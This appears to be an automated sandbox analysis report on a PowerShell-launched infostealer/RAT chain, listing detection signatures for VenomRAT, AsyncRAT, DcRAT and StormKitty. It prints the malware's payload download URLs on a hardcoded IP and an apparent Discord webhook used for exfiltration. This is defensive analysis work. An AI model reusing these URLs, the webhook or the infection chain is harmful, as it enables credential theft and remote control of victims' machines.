f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1
            Source: global trafficHTTP traffic detected: GET /infopage/vfdjo.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 157.20.182.177 157.20.182.177
            Source: Joe Sandbox ViewASN Name: FCNUniversityPublicCorporationOsakaJP FCNUniversityPublicCorporationOsakaJP
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/vfdjo.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/yijth.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AB777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/vfdjo.exe
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1317858131.00000219C3AD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219AB9A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1254833761.000001B909BE2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1254910896.000001B909BD1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1255776264.000001B909D7B000.00000004.00001000.00020000.00000000.sdmp, ewvozk4a.0.cs.0.dr, ewvozk4a.dll.3.drString found in binary or memory: http://147.45.44.131/infopage/yijth.exe
            Source: csc.exe, 00000003.00000003.1254989145.000001B909BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/yijth.exeqqn
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44X
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.H
            Source: RegAsm.exe, 0000000A.00000002.3686261366.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.10.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 0000000A.00000002.3701292664.0000000005370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enA
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
            Source: RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACFAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AB551000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AB551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
            Source: RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219AB9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACD82000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACF4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1283601445.00000219AC7DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACFAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB5C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000000.00000002.1283601445.00000219ACE75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Keylogger Generic
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected VenomRAT
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: dump.pcap, type: PCAPMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.219ace53b18.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219ace4d6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219ab9e88f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219acd82cf6.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219ab9a4e58.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219acd986b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219ab9a19ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.219acd82cf6.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219ab9a19ce.6.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
